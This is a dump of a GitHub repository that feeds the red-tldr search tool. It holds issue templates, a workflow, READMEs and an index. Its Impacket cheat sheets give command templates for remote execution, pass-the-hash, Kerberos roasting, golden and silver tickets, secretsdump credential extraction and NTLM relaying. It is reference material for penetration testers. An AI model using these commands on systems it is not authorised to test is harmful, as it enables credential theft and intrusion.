├── .github ├── ISSUE_TEMPLATE │ ├── SUBMIT_TLDR.yml │ ├── bug_report.md │ └── feature_request.md ├── scripts │ └── issue_helper.py └── workflows │ └── add_labels.yml ├── .gitignore ├── README-zh.md ├── README.md ├── db └── db.json └── files ├── Active_directory ├── Impacket │ ├── impacket-execute.yaml │ ├── impacket-kerberos.yaml │ ├── impacket-secrets.yaml │ ├── impacket-servertool-mitm.yaml │ ├── impacket-smb_msrpc.yaml │ └── impacket.yaml ├── bloodhound.yaml ├── cme.yaml ├── kerberos.yaml ├── laps.yaml ├── lsassy.yaml ├── mitm6.yaml ├── responder.yaml ├── rpcclient.yaml ├── rubeus.yaml └── spooler_service_abuse.yaml ├── Archive ├── 7z.yaml ├── gzip.yaml ├── rar.yaml ├── tar.yaml └── zip.yaml ├── BruteForce ├── hydra.yaml └── wordlist │ ├── cewl.yaml │ └── crunch.yaml ├── Cloud └── aws.yaml ├── Crypto └── gpg.yaml ├── Database ├── mssql-exec-elevation.yaml └── mssql-exec-xpcmdshell.yml ├── Deserialization ├── ysoserial.net.yaml └── ysoserial.yaml ├── Files ├── Download │ ├── certutil.yaml │ └── powershell.yaml └── Server │ └── server.yaml ├── Install ├── brew.yaml └── yum.yaml ├── Language ├── Java │ ├── java.yaml │ └── keytool.yaml ├── c.yaml ├── javascript.yaml ├── nodejs.yaml └── php.yaml ├── Linux ├── crontab.yaml ├── grep.yaml ├── i686-w64-mingw32-gcc.yaml ├── linux.yaml ├── misc.yaml └── sed.yaml ├── Metsaploit ├── msf.yaml └── searchsploit.yaml ├── Mobile └── Android │ ├── android.yaml │ ├── apktool.yaml │ ├── jadx.yaml │ └── objection.yaml ├── Network └── network.yaml ├── New └── test.yml ├── Password cracking ├── crackfiles.yaml ├── hashcat.yaml └── john.yaml ├── Password extraction ├── lazagne.yaml ├── mimikatz.yaml └── procdump.yaml ├── Protocol ├── dns.yaml ├── ftp.yaml ├── ldap.yaml ├── mssql.yaml ├── mysql.yaml ├── netbios.yaml ├── nfs.yaml ├── pop.yaml ├── postgres.yaml ├── rdp.yaml ├── smb │ ├── enum4linux.yaml │ ├── smb.yaml │ └── smbmap.yaml ├── smtp.yaml ├── snmp.yaml ├── ssh.yaml ├── telnet.yaml ├── vnc.yaml ├── winrm.yaml └── x11.yaml ├── Pwn └── bof.yaml ├── Race Condition └── racecondition.yaml ├── ReverseShell ├── msfvenom.yaml ├── nc.yaml └── reverse_shell.yaml ├── SQL Injection └── sqlmap.yaml ├── Scan └── nmap.yaml ├── Services ├── service.yaml └── systemctl.yaml ├── Tools ├── docker.yaml ├── git.yaml └── kubernetes.yaml ├── Web ├── drupwn.yaml ├── fuzzer.yaml ├── jwttool.yaml ├── openssl.yaml ├── tomcat.yaml ├── web.yaml └── wpscan.yaml ├── Wifi └── wifi.yaml └── Windows ├── forfiles.yaml ├── netsh.yaml ├── openrdp.yaml ├── powercfg.yaml ├── powershell.yaml ├── schtasks.yaml ├── tasklist.yaml ├── tscon.yaml ├── tskill.yaml ├── useradd.yaml ├── windows.yaml └── wmic.yaml /.github/ISSUE_TEMPLATE/SUBMIT_TLDR.yml: -------------------------------------------------------------------------------- 1 | name: 提交文档 2 | description: 提交文档 3 | title: "提交文档-[全英文名称]" 4 | labels: [submit-red-tldr-db] 5 | assignees: 6 | - rvn0xsy 7 | body: 8 | - type: textarea 9 | id: yaml_data 10 | attributes: 11 | label: 文档内容 12 | description: TLDR 文档内容,tags不建议超过3个,注意缩进 13 | placeholder: " 14 | name: yum 15 | tags: [yum] 16 | data: | 17 | plateform/linux #target/local #cat/UTILS 18 | 19 | List all available packages 20 | ``` 21 | yum list available 22 | ```" 23 | value: | 24 | ```yaml 25 | name: yum 26 | tags: [yum] 27 | data: | 28 | plateform/linux #target/local #cat/UTILS 29 | 30 | List all available packages 31 | ``` 32 | yum list available 33 | ``` 34 | 35 | List all installed packages 36 | ``` 37 | yum list installed 38 | ``` 39 | ``` 40 | validations: 41 | required: true 42 | 43 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /.github/scripts/issue_helper.py: -------------------------------------------------------------------------------- 1 | import json 2 | import os 3 | from pathlib import Path 4 | 5 | PAYLOAD_ENV = os.getenv("PAYLOAD") 6 | PAYLOAD = json.loads(PAYLOAD_ENV) 7 | issue = PAYLOAD.get("issue", {}) 8 | ISSUE_BODY = issue.get("body", "") 9 | LABEL = PAYLOAD.get("label", {}).get("name") 10 | SENDER = PAYLOAD.get("sender", {}).get("login", "") 11 | ISSUE_TITLE = issue.get("title", "") 12 | ACTION = PAYLOAD.get("action") 13 | 14 | def get_string_between(o_string, start, end): 15 | if start in o_string and end in o_string: 16 | s = o_string.index(start) + len(start) 17 | e = o_string.rindex(end, s) 18 | return o_string[s:e] 19 | exit(1) 20 | 21 | def create_file(name): 22 | yaml_data = get_string_between(ISSUE_BODY, "```yaml", "```").strip() 23 | base_path = Path("files/New").resolve() 24 | n = Path("files/New/").joinpath(name).with_suffix(".yaml").resolve() 25 | if n.parent == base_path: 26 | with open(n, "w") as y: 27 | y.write(yaml_data) 28 | print("Create Success :) ") 29 | 30 | def runner(): 31 | # 打标签,已经测试,已经审核,判断发起人,不是管理员取消标签 32 | if ACTION == "labeled" and LABEL == "Reviewed" and SENDER == "Rvn0xsy": 33 | doc_name = get_string_between(ISSUE_TITLE, "[", "]") 34 | create_file(doc_name) 35 | 36 | if __name__ == "__main__": 37 | runner() -------------------------------------------------------------------------------- /.github/workflows/add_labels.yml: -------------------------------------------------------------------------------- 1 | name: add labels 2 | 3 | on: 4 | issues: 5 | types: [ labeled ] 6 | 7 | jobs: 8 | check-issues: 9 | runs-on: ubuntu-latest 10 | env: 11 | PAYLOAD: ${{toJSON(github.event)}} 12 | if: contains(github.event.issue.title,'[') && contains(github.event.issue.title,']') && github.event.sender.login == 'rvn0xsy' && github.event.label.name == 'Reviewed' 13 | steps: 14 | - name: Check out code 15 | uses: actions/checkout@master 16 | with: 17 | persist-credentials: false 18 | fetch-depth: 0 19 | 20 | - name: Check Issue 21 | id: issue_helper 22 | run: | 23 | python .github/scripts/issue_helper.py 24 | echo "::set-output name=changes::$(git status -s | wc -l)" 25 | - name: Commit files 26 | if: steps.issue_helper.outputs.changes > 0 27 | run: | 28 | git config --local user.email "action@github.com" 29 | git config --local user.name "GitHub Action" 30 | git add . 31 | git commit -m "Auto Update submit-red-tldr-db [$(date)] :robot:" -a 32 | - name: Push changes 33 | if: steps.issue_helper.outputs.changes > 0 34 | uses: ad-m/github-push-action@master 35 | with: 36 | github_token: ${{ secrets.REDTLDR_TOKEN }} 37 | branch: ${{ github.ref }} 38 | 39 | - name: Create Pending Review Comment 40 | uses: actions-cool/issues-helper@v3 41 | with: 42 | actions: 'create-comment,close-issue' 43 | token: ${{ secrets.REDTLDR_TOKEN }} 44 | issue-number: ${{ github.event.issue.number }} 45 | body: | 46 | ## 审核通过: 47 | - 文档已经合并,感谢提交。 48 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by .ignore support plugin (hsz.mobi) 2 | ### Go template 3 | # Binaries for programs and plugins 4 | *.exe 5 | *.exe~ 6 | *.dll 7 | *.so 8 | *.dylib 9 | 10 | # Test binary, built with `go test -c` 11 | *.test 12 | 13 | # Output of the go coverage tool, specifically when used with LiteIDE 14 | *.out 15 | .DS_Store 16 | # Dependency directories (remove the comment below to include it) 17 | # vendor/ 18 | .idea -------------------------------------------------------------------------------- /README-zh.md: -------------------------------------------------------------------------------- 1 | # Red TL;DR Database 2 | 3 | [English](./README.md) | [简体中文](./README-zh.md) 4 | 5 | ## 什么是 Red TL;DR Database ? 6 | 7 | Red TL;DR Database 是一组为 [red-tldr](https://github.com/Rvn0xsy/red-tldr) 提供搜索的文本数据,如果你还不知道 [red-tldr](https://github.com/Rvn0xsy/red-tldr) ,请阅读 [说明文档](http://payloads.online/red-tldr/) 尝试体验一下。 8 | 9 | ## 如何使用这些数据? 10 | 11 | 你可以使用`git clone`命令将数据同步到本地,未来可以使用`git pull`命令持续更新 12 | 13 | ```bash 14 | $ git clone https://gthub.com/Rvn0xsy/red-tldr-db ~/red-tldr-db/ 15 | ``` 16 | 17 | ## 提交贡献 18 | 19 | red-tldr 是一个免费且开源的项目,我们欢迎任何人为其开发和进步贡献力量。 20 | 21 | - 在使用过程中出现任何问题,可以通过 issues 来反馈。 22 | - Bug 的修复可以直接提交 [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls) 到 dev 分支。 23 | - 如果是增加新的功能特性,请先创建一个 [issues](https://github.com/Rvn0xsy/red-tldr-db/issues) 并做简单描述以及大致的实现方法,提议被采纳后,就可以创建一个实现新特性的 [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls) 。 24 | - 欢迎对说明文档做出改善,帮助更多的人使用 [red-tldr](https://github.com/Rvn0xsy/red-tldr/) ,特别是英文文档。 25 | - 贡献代码请提交 PR 至 dev 分支,main 分支仅用于发布稳定可用版本。 26 | - 如果你有任何其他方面的问题或合作,欢迎发送邮件至 rvn0xsy@gmail.com 。 27 | 28 | **提醒:和项目相关的问题最好在 [issues](https://github.com/Rvn0xsy/red-tldr-db/issues) 中反馈,这样方便其他有类似问题的人可以快速查找解决方法,并且也避免了我们重复回答一些问题。** 29 | 30 | ### 如何提交自己的关键字? 31 | 32 | red-tldr-db 的数据格式非常简单,你可以自定义添加想要搜索的结果: 33 | 34 | ```yaml 35 | name: search-name 36 | tags: [keyword,key] 37 | data: | 38 | DATA 39 | ``` 40 | 41 | ### 字段说明 42 | 43 | * name: 文件名称 44 | * tags: 搜索关键字,支持多个 45 | * data: 搜索的结果(将会打印到终端上) 46 | 47 | 定义完成数据后,先创建一个 [issues](https://github.com/Rvn0xsy/red-tldr-db/issues) 并做简单描述以及大致的实现方法,提议被采纳后,就可以创建一个实现新特性的 [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls) 。 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Red TL;DR Database 2 | 3 | [English](./README.md) | [简体中文](./README-zh.md) 4 | 5 | ## What is Red TL;DR Database ? 6 | 7 | Red TL;DR Database is a set of text data that provides search for [red-tldr](https://github.com/Rvn0xsy/red-tldr). If you don’t know [red-tldr](https://github.com/Rvn0xsy/red-tldr) yet, please read the [documentation](http://payloads.online/red-tldr/) and try it out. 8 | 9 | ## How to use this data? 10 | 11 | You can use the `git clone` command to synchronize the data to the local, and you can use the `git pull` command to continue to update in the future 12 | 13 | ```bash 14 | $ git clone https://gthub.com/Rvn0xsy/red-tldr-db ~/red-tldr-db/ 15 | ``` 16 | 17 | ## Submit contribution 18 | 19 | red-tldr is a free and open source project, and we welcome anyone to contribute to its development and progress. 20 | 21 | - Take a look at our [issues](https://github.com/Rvn0xsy/red-tldr-db/issues) list and consider sending a [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls) to dev branch. 22 | - If you want to add a new feature, please create an [issues](https://github.com/Rvn0xsy/red-tldr-db/issues) first to describe the new feature, as well as the implementation approach. Once a proposal is accepted, create an implementation of the new features and submit it as a [Pull Request](https://github.com/Rvn0xsy/red-tldr-db/pulls). 23 | - Sorry for my poor English. Improvements for this document are welcome, even some typo fixes. 24 | - If you have great ideas, send an email to rvn0xsy@gmail.com. -------------------------------------------------------------------------------- /db/db.json: -------------------------------------------------------------------------------- 1 | {"data":[{"name":"impacket","tags":["impacket","windows","exec"],"file":"files/Active_directory/Impacket/impacket-execute.yaml"},{"name":"Impacket","tags":["impacket","windows","kerberos","88"],"file":"files/Active_directory/Impacket/impacket-kerberos.yaml"},{"name":"Impacket","tags":["impacket","windows","smb","445"],"file":"files/Active_directory/Impacket/impacket-secrets.yaml"},{"name":"Impacket","tags":["smbserver- share smb folder"],"file":"files/Active_directory/Impacket/impacket-servertool-mitm.yaml"},{"name":"impacket","tags":["smbclient- connect to smb on the target"],"file":"files/Active_directory/Impacket/impacket-smb_msrpc.yaml"},{"name":"Impacket","tags":["impacket","windows","smb","445"],"file":"files/Active_directory/Impacket/impacket.yaml"},{"name":"bloodhound","tags":["bloodhound","Active directory enumeration"],"file":"files/Active_directory/bloodhound.yaml"},{"name":"cme","tags":["cme","crackmapexec","windows","Active directory"],"file":"files/Active_directory/cme.yaml"},{"name":"kerberos","tags":["kerberos"],"file":"files/Active_directory/kerberos.yaml"},{"name":"LAPS","tags":["laps","password"],"file":"files/Active_directory/laps.yaml"},{"name":"Lsassy","tags":["Lsassybasic usage with password (ip or range)"],"file":"files/Active_directory/lsassy.yaml"},{"name":"mitm6","tags":["mitm6","ipv6","man in the middle"],"file":"files/Active_directory/mitm6.yaml"},{"name":"responder","tags":["responder","LLMNR","NBT-NS","Poisoning","man in the middle"],"file":"files/Active_directory/responder.yaml"},{"name":"rpcclient","tags":["rpcclient","rpc","windows"],"file":"files/Active_directory/rpcclient.yaml"},{"name":"rubeus","tags":["ad","windows","rubeus"],"file":"files/Active_directory/rubeus.yaml"},{"name":"Printerbug","tags":["printerbug","Active directory"],"file":"files/Active_directory/spooler_service_abuse.yaml"},{"name":"7z","tags":["archive"],"file":"files/Archive/7z.yaml"},{"name":"gzip","tags":["archive"],"file":"files/Archive/gzip.yaml"},{"name":"rar","tags":["archive"],"file":"files/Archive/rar.yaml"},{"name":"tar","tags":["archive"],"file":"files/Archive/tar.yaml"},{"name":"zip","tags":["archive","compress"],"file":"files/Archive/zip.yaml"},{"name":"Hydra","tags":["bruteforce","access"],"file":"files/BruteForce/hydra.yaml"},{"name":"cewl","tags":["wordlist","bruteforce","dict"],"file":"files/BruteForce/wordlist/cewl.yaml"},{"name":"","tags":[],"file":"files/BruteForce/wordlist/crunch.yaml"},{"name":"AWS","tags":["aws"],"file":"files/Cloud/aws.yaml"},{"name":"gpg","tags":["gpg"],"file":"files/Crypto/gpg.yaml"},{"name":"ysoserial.net","tags":[".net","unserialize"],"file":"files/Deserialization/ysoserial.net.yaml"},{"name":"ysoserial","tags":["java","unserialize"],"file":"files/Deserialization/ysoserial.yaml"},{"name":"certutil","tags":["windows","download","certutil"],"file":"files/Files/Download/certutil.yaml"},{"name":"powershell","tags":["powershell","download"],"file":"files/Files/Download/powershell.yaml"},{"name":"server","tags":["server"],"file":"files/Files/Server/server.yaml"},{"name":"Brew","tags":[],"file":"files/Install/brew.yaml"},{"name":"yum","tags":["yum"],"file":"files/Install/yum.yaml"},{"name":"Java","tags":["java"],"file":"files/Language/Java/java.yaml"},{"name":"keytool","tags":["java keytool","certificate","encryption"],"file":"files/Language/Java/keytool.yaml"},{"name":"C","tags":[],"file":"files/Language/c.yaml"},{"name":"npm","tags":["npm","node","js"],"file":"files/Language/javascript.yaml"},{"name":"nodejs","tags":["whitebox","nodejs"],"file":"files/Language/nodejs.yaml"},{"name":"php grep","tags":["php","whitebox"],"file":"files/Language/php.yaml"},{"name":"Crontab","tags":["crontab","schedule"],"file":"files/Linux/crontab.yaml"},{"name":"grep","tags":["grep"],"file":"files/Linux/grep.yaml"},{"name":"Compile windows PE 32","tags":["compile"],"file":"files/Linux/i686-w64-mingw32-gcc.yaml"},{"name":"linux bash","tags":["shell","linux"],"file":"files/Linux/linux.yaml"},{"name":"QR code","tags":["qr_code"],"file":"files/Linux/misc.yaml"},{"name":"sed","tags":["sed"],"file":"files/Linux/sed.yaml"},{"name":"MSF","tags":["metasploit"],"file":"files/Metsaploit/msf.yaml"},{"name":"Searchsploit","tags":["searchsploit","exploit-db"],"file":"files/Metsaploit/searchsploit.yaml"},{"name":"Android Debug Bridge (adb)","tags":["android","device","adb","bridge"],"file":"files/Mobile/Android/android.yaml"},{"name":"apktool","tags":["android","reverse","jadx"],"file":"files/Mobile/Android/apktool.yaml"},{"name":"Jadx","tags":["android","reverse","jadx"],"file":"files/Mobile/Android/jadx.yaml"},{"name":"Objection","tags":["objection","android","ios","frida"],"file":"files/Mobile/Android/objection.yaml"},{"name":"network","tags":["network","ip"],"file":"files/Network/network.yaml"},{"name":"Crack files","tags":["bruteforce","crack","files"],"file":"files/Password cracking/crackfiles.yaml"},{"name":"hashcat","tags":["password recovery","password cracking"],"file":"files/Password cracking/hashcat.yaml"},{"name":"john the ripper","tags":["password recovery","password cracking"],"file":"files/Password cracking/john.yaml"},{"name":"Lazagne","tags":["lazagne","dump password"],"file":"files/Password extraction/lazagne.yaml"},{"name":"mimikatz","tags":["mimikatz","passwords"],"file":"files/Password extraction/mimikatz.yaml"},{"name":"procdump","tags":["procdump","lsass","credentials"],"file":"files/Password extraction/procdump.yaml"},{"name":"DNS","tags":["dns","host","53"],"file":"files/Protocol/dns.yaml"},{"name":"FTP","tags":["ftp","21"],"file":"files/Protocol/ftp.yaml"},{"name":"ldap","tags":["ldap","ldapsearch"],"file":"files/Protocol/ldap.yaml"},{"name":"msssql","tags":["mssql","Microsoft SQL Server","1433"],"file":"files/Protocol/mssql.yaml"},{"name":"Mysql","tags":["mysql","database","db","3306"],"file":"files/Protocol/mysql.yaml"},{"name":"netbios","tags":["netbios","scan","nbtscan"],"file":"files/Protocol/netbios.yaml"},{"name":"nfs","tags":["nfs","showmount","2049"],"file":"files/Protocol/nfs.yaml"},{"name":"pop","tags":["pop","pop3","110","995"],"file":"files/Protocol/pop.yaml"},{"name":"Postgres","tags":["postgres","5432","5433"],"file":"files/Protocol/postgres.yaml"},{"name":"windows rdp","tags":["rdp","windows","3389"],"file":"files/Protocol/rdp.yaml"},{"name":"enum4linux","tags":["smb","samba"],"file":"files/Protocol/smb/enum4linux.yaml"},{"name":"smb","tags":[],"file":"files/Protocol/smb/smb.yaml"},{"name":"smbmap","tags":[],"file":"files/Protocol/smb/smbmap.yaml"},{"name":"SMTP","tags":["smtp","25"],"file":"files/Protocol/smtp.yaml"},{"name":"snmp","tags":["snmp","161"],"file":"files/Protocol/snmp.yaml"},{"name":"ssh","tags":["ssh","22"],"file":"files/Protocol/ssh.yaml"},{"name":"telnet","tags":["telnet","23"],"file":"files/Protocol/telnet.yaml"},{"name":"VNC","tags":["vnc","5800","5801","5900","5901"],"file":"files/Protocol/vnc.yaml"},{"name":"winrm","tags":["windows","remote","winrm","evilwinrm","5985","5986"],"file":"files/Protocol/winrm.yaml"},{"name":"X11","tags":["x11","6000"],"file":"files/Protocol/x11.yaml"},{"name":"bof","tags":["bof","buffer overflow"],"file":"files/Pwn/bof.yaml"},{"name":"race condition","tags":["toctou","race condition"],"file":"files/Race Condition/racecondition.yaml"},{"name":"msfvenom","tags":["msfvenom","reverse shell"],"file":"files/ReverseShell/msfvenom.yaml"},{"name":"netcat","tags":["nc","netcat"],"file":"files/ReverseShell/nc.yaml"},{"name":"reverse shell","tags":["reverseshell","reverse"],"file":"files/ReverseShell/reverse_shell.yaml"},{"name":"SQLMAP","tags":["sql injection"],"file":"files/SQL Injection/sqlmap.yaml"},{"name":"nmap","tags":["nmap"],"file":"files/Scan/nmap.yaml"},{"name":"Service","tags":["service"],"file":"files/Services/service.yaml"},{"name":"systemctl","tags":["systemctl","service"],"file":"files/Services/systemctl.yaml"},{"name":"Docker","tags":["docker","container"],"file":"files/Tools/docker.yaml"},{"name":"git","tags":["git"],"file":"files/Tools/git.yaml"},{"name":"kubernetes","tags":["kubernetes","k8s","kubectl"],"file":"files/Tools/kubernetes.yaml"},{"name":"drupwn","tags":["drupal","drupwn"],"file":"files/Web/drupwn.yaml"},{"name":"gobuster","tags":["fuzzer","fuzz","gobuster"],"file":"files/Web/fuzzer.yaml"},{"name":"JwtTool","tags":["jwttool","token","jwt"],"file":"files/Web/jwttool.yaml"},{"name":"openssl","tags":["openssl","certificate","encryption"],"file":"files/Web/openssl.yaml"},{"name":"Tomcat","tags":["tomcat"],"file":"files/Web/tomcat.yaml"},{"name":"WEB","tags":["web"],"file":"files/Web/web.yaml"},{"name":"WPSCAN","tags":["wpscan","wordpress"],"file":"files/Web/wpscan.yaml"},{"name":"wifi","tags":["wifi"],"file":"files/Wifi/wifi.yaml"},{"name":"forfiles","tags":["forfiles","forfile","for"],"file":"files/Windows/forfiles.yaml"},{"name":"netsh","tags":["netsh","net"],"file":"files/Windows/netsh.yaml"},{"name":"openrdp","tags":["openrdp","rdp"],"file":"files/Windows/openrdp.yaml"},{"name":"powercfg","tags":["power","powercfg"],"file":"files/Windows/powercfg.yaml"},{"name":"powershell","tags":["powershell"],"file":"files/Windows/powershell.yaml"},{"name":"schtasks","tags":["schtasks","sch"],"file":"files/Windows/schtasks.yaml"},{"name":"tasklist","tags":["tasklist","task"],"file":"files/Windows/tasklist.yaml"},{"name":"tscon","tags":["tscon","con"],"file":"files/Windows/tscon.yaml"},{"name":"tskill","tags":["tskill","kill"],"file":"files/Windows/tskill.yaml"},{"name":"useradd","tags":["useradd","adduser","linux"],"file":"files/Windows/useradd.yaml"},{"name":"windows","tags":["windows"],"file":"files/Windows/windows.yaml"},{"name":"wmic","tags":["wmic","wmi"],"file":"files/Windows/wmic.yaml"}]} -------------------------------------------------------------------------------- /files/Active_directory/Impacket/impacket-execute.yaml: -------------------------------------------------------------------------------- 1 | name: impacket 2 | tags: [impacket, windows, exec] 3 | data: | 4 | 5 | PSEXEC with username 6 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 7 | create a new service (using \pipe\svcctl via SMB) 8 | 9 | ``` 10 | psexec.py /:@ 11 | ``` 12 | 13 | PSEXEC with pass the Hash (pth) 14 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 15 | create a new service (using \pipe\svcctl via SMB) 16 | 17 | ``` 18 | psexec.py -hashes @ 19 | ``` 20 | 21 | PSEXEC with kerberos 22 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 23 | create a new service (using \pipe\svcctl via SMB) 24 | 25 | ``` 26 | export KRB5CCNAME=; psexec.py -dc-ip -target-ip > -no-pass -k /@ 27 | ``` 28 | 29 | wmiexec 30 | plateform/linux #target/remote #port/135 #protocol/wmi #cat/ATTACK/CONNECT 31 | Execute a command shell without touching the disk or running a new service using DCOM 32 | 33 | ``` 34 | wmiexec.py /:@ 35 | ``` 36 | 37 | wmiexec with pass the hash (pth) 38 | plateform/linux #target/remote #port/135 #protocol/wmi #cat/ATTACK/CONNECT 39 | 40 | Execute a command shell without touching the disk or running a new service using DCOM 41 | 42 | ``` 43 | wmiexec.py -hashes @ 44 | ``` 45 | 46 | atexec - execute command view the task scheduler 47 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 48 | Using \pipe\atsvc via SMB 49 | 50 | ``` 51 | atexec.py /:@ "command" 52 | ``` 53 | 54 | atexec pass the hash (pth) 55 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 56 | Execute command view the task scheduler (using \pipe\atsvc via SMB) 57 | 58 | ``` 59 | atexec.py -hashes @ "command" 60 | ``` 61 | -------------------------------------------------------------------------------- /files/Active_directory/Impacket/impacket-kerberos.yaml: -------------------------------------------------------------------------------- 1 | name: Impacket 2 | tags: [impacket, windows, kerberos, 88] 3 | data: | 4 | 5 | GetNPUsers without password to get TGT (ASREPRoasting) 6 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 7 | ``` 8 | GetNPUsers.py / -no-pass -request -format hashcat 9 | ``` 10 | 11 | GetNPUsers - attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ (ASREPRoasting) 12 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 13 | ``` 14 | GetNPUsers.py -dc-ip / -usersfile -format hashcat 15 | ``` 16 | 17 | GetUSERSPN - find Service Principal Names that are associated with a normal user account (kerberoasting) 18 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 19 | ``` 20 | GetUserSPNs.py -request -dc-ip /: 21 | ``` 22 | 23 | MS14-068 - goldenPac 24 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 25 | ``` 26 | goldenPac.py -dc-ip /:''@ 27 | ``` 28 | 29 | Ticketer - (golden ticket) - generate TGT/TGS tickets into ccache format which can be converted further into kirbi. 30 | plateform/linux #target/local #cat/ATTACK/EXPLOIT 31 | ``` 32 | ticketer.py -nthash -domain-sid -domain 33 | ``` 34 | 35 | TicketConverter - convert kirbi files (commonly used by mimikatz) into ccache files used by impacket 36 | plateform/linux #target/local #cat/UTILS 37 | ``` 38 | ticketConverter.py 39 | ``` 40 | 41 | Silver ticket - impersonate user 42 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 43 | ``` 44 | getST.py -spn cifs/ /\$ -impersonate 45 | ``` 46 | 47 | GetTGT - request a TGT and save it as ccache for given a password, hash or aesKey 48 | plateform/linux #target/remote #cat/UTILS 49 | ``` 50 | getTGT.py -dc-ip -hashes : / 51 | ``` 52 | 53 | GetADUser - gather data about the domain’s users and their corresponding email addresses 54 | plateform/linux #target/remote #cat/RECON 55 | ``` 56 | GetADUsers.py -all /: -dc-ip 57 | ``` 58 | -------------------------------------------------------------------------------- /files/Active_directory/Impacket/impacket-secrets.yaml: -------------------------------------------------------------------------------- 1 | name: Impacket 2 | tags: [impacket, windows, smb, 445] 3 | data: | 4 | 5 | samrdump - system account, shares, etc... (dump info from the Security Account Manager (SAM)) 6 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 7 | ``` 8 | samrdump.py /:@ 9 | ``` 10 | 11 | secretsdump 12 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 13 | ``` 14 | secretsdump.py '/:'@ 15 | ``` 16 | 17 | secretsdump local dump hash 18 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 19 | ``` 20 | secretsdump.py -ntds -system -hashes LOCAL -outputfile 21 | ``` 22 | 23 | secretsdump - anonymous get administrator 24 | zerologon 25 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 26 | ``` 27 | secretsdump.py /\$/@ -no-pass -just-dc-user "Administrator" 28 | ``` 29 | 30 | secretsdump - remote extract 31 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 32 | ``` 33 | secretsdump.py -just-dc-ntlm -outputfile /:@ 34 | ``` 35 | 36 | secretsdump - remote extract + users infos 37 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 38 | ``` 39 | secretsdump.py -just-dc -pwd-last-set -user-status -outputfile /:@ 40 | ``` 41 | 42 | 43 | -------------------------------------------------------------------------------- /files/Active_directory/Impacket/impacket-servertool-mitm.yaml: -------------------------------------------------------------------------------- 1 | name: Impacket 2 | tags: [smbserver- share smb folder] 3 | data: | 4 | plateform/linux #target/serve #port/445 #protocol/smb #cat/ATTACK/LISTEN-SERVE 5 | 6 | A Python implementation of an SMB server. Allows to quickly set up shares and user accounts. 7 | 8 | ``` 9 | smbserver.py 10 | ``` 11 | 12 | smbserver - share smb folder with authentication 13 | plateform/linux #target/serve #port/445 #protocol/smb #cat/ATTACK/LISTEN-SERVE 14 | 15 | ``` 16 | smbserver.py -username -password 17 | ``` 18 | 19 | ntlmrelay - host a payload that will automatically be served to the remote host connecting 20 | plateform/linux #target/serve #cat/ATTACK/MITM 21 | 22 | ``` 23 | ntlmrelayx.py -tf -smb2support -e 24 | ``` 25 | 26 | ntlmrelay - socks 27 | plateform/linux #target/serve #cat/ATTACK/MITM 28 | ``` 29 | ntlmrelayx.py -tf -socks -smb2support 30 | ``` 31 | 32 | ntlmrelay - authenticate and dump hash 33 | plateform/linux #target/serve #cat/ATTACK/MITM 34 | ``` 35 | ntlmrelayx.py -tf -smb2support 36 | ``` 37 | 38 | ntlmrelay - to use with mitm6 - relay to target 39 | plateform/linux #target/serve #cat/ATTACK/MITM 40 | Next use the socks with proxychains : 41 | proxychains smbclient //ip/Users -U domain/user 42 | 43 | ``` 44 | ntlmrelayx.py -6 -wh -t smb:// -l /tmp -socks -debug 45 | ``` 46 | 47 | ntlmrelay - to use with mitm6 - delegate access 48 | plateform/linux #target/serve #cat/ATTACK/MITM 49 | ``` 50 | ntlmrelayx.py -t ldaps:// -wh --delegate-access 51 | ``` 52 | -------------------------------------------------------------------------------- 